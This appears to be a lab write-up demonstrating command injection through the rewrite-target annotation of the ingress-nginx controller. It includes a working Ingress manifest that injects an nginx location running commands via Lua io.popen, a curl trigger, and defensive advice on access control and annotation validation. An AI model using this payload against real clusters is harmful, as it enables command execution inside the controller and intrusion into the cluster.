查看版本
root@ubuntu-linux-22-04-desktop:/home/parallels/Desktop/test# k exec -it ingress-nginx-controller-86dcd6d496-cvtd4 -n ingress-nginx bash
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
node2:/etc/nginx$ /nginx-ingress-controller -v
-------------------------------------------------------------------------------
NGINX Ingress controller
Release: v1.8.4
Build: 05adfe3ee56fab8e4aded7ae00eed6630e43b458
Repository: https://github.com/kubernetes/ingress-nginx
nginx version: nginx/1.21.6
-------------------------------------------------------------------------------
安装
安装ingress-nginx
# Fetch the static "cloud" provider manifest pinned to the controller-v1.8.4 tag,
# then apply it to the cluster. wget saves it as deploy.yaml in the current directory.
# NOTE(review): `k` appears to be the author's alias for kubectl; confirm.
manifest_url='https://raw.githubusercontent.com/kubernetes/ingress-nginx/controller-v1.8.4/deploy/static/provider/cloud/deploy.yaml'
wget "$manifest_url"
k apply -f deploy.yaml
原理
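nginx.ingress.kubernetes.io/rewrite-target 注解(annotation,不是标签)的值会被控制器直接插入到生成的 nginx 配置中。我们注入自己的恶意字符串,先闭合原有的 location 块,再追加一个新的 location,并利用 content_by_lua_block 中 Lua 脚本执行命令的功能,就得到了一个可以执行命令的路由。利用的前提是攻击者有权创建或修改 Ingress 对象,命令在 ingress-nginx 控制器容器内执行;防守方应收紧 Ingress 的创建/修改权限,并在准入阶段校验注解值(例如拒绝包含换行、花括号或 lua 指令的 rewrite-target)。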
# Explanatory fragment: the annotation value exactly as the author supplies it.
# Indentation was lost in this paste, so the block-scalar body is shown flush left.
# The value is not a URI path. "last;" followed by "}" ends the rewrite directive and
# the enclosing block; the middle lines declare a new location whose Lua content handler
# calls io.popen; the trailing "location /fs/{" re-opens a block, presumably so that the
# brace emitted by the controller's template still balances (the rendered nginx.conf is
# not shown on this page; confirm there).
# The two inline Chinese notes read "redirects all requests to /execute-command" and
# "injects a new path that runs commands through a Lua script".
# Detection hint: a rewrite-target value that spans several lines or contains '}',
# 'location' or 'content_by_lua_block' is not a plausible rewrite path and can be
# rejected or alerted on when the Ingress is created or updated.
nginx.ingress.kubernetes.io/rewrite-target: |
execute-command/ last; #用于将所有请求重定向到/execute-command
}
#注入了一个新路径,用于通过lua脚本执行命令
location execute-command/ {
content_by_lua_block {
local handle = io.popen("ls -l")
local result = handle:read("*a")
handle:close()
ngx.say(result)
}
}
location /fs/{
演示
部署的ingress如下所示
# Demonstration Ingress from the writeup. Indentation was lost in this paste, so the
# text below is not valid YAML as shown.
# Defender's view: the only unusual field is the rewrite-target annotation. Its value
# spans several lines and carries nginx block syntax plus a Lua content handler instead
# of a URI path. Admission policy or audit rules that flag newlines, braces or
# *_by_lua* directives in ingress-nginx annotation values would catch this object at
# create/update time, before the controller renders it into nginx configuration.
# kubernetes.io/ingress.class is the legacy annotation form of spec.ingressClassName.
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: ingress-exploit
annotations:
kubernetes.io/ingress.class: "nginx"
nginx.ingress.kubernetes.io/rewrite-target: |
execute-command/ last;
}
location execute-command/ {
content_by_lua_block {
local handle = io.popen("ls -l")
local result = handle:read("*a")
handle:close()
ngx.say(result)
}
}
location /fs/{
spec:
rules:
- host: k8s.evil.me
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: exploit
port:
number: 8080
在容器中可以看到
# Send a request through the controller; the Host header matches the k8s.evil.me
# rule of the Ingress above, so the response comes from the injected location.
# NOTE(review): 10.98.219.148 is presumably the controller Service's cluster IP; confirm.
curl -H 'Host: k8s.evil.me' http://10.98.219.148/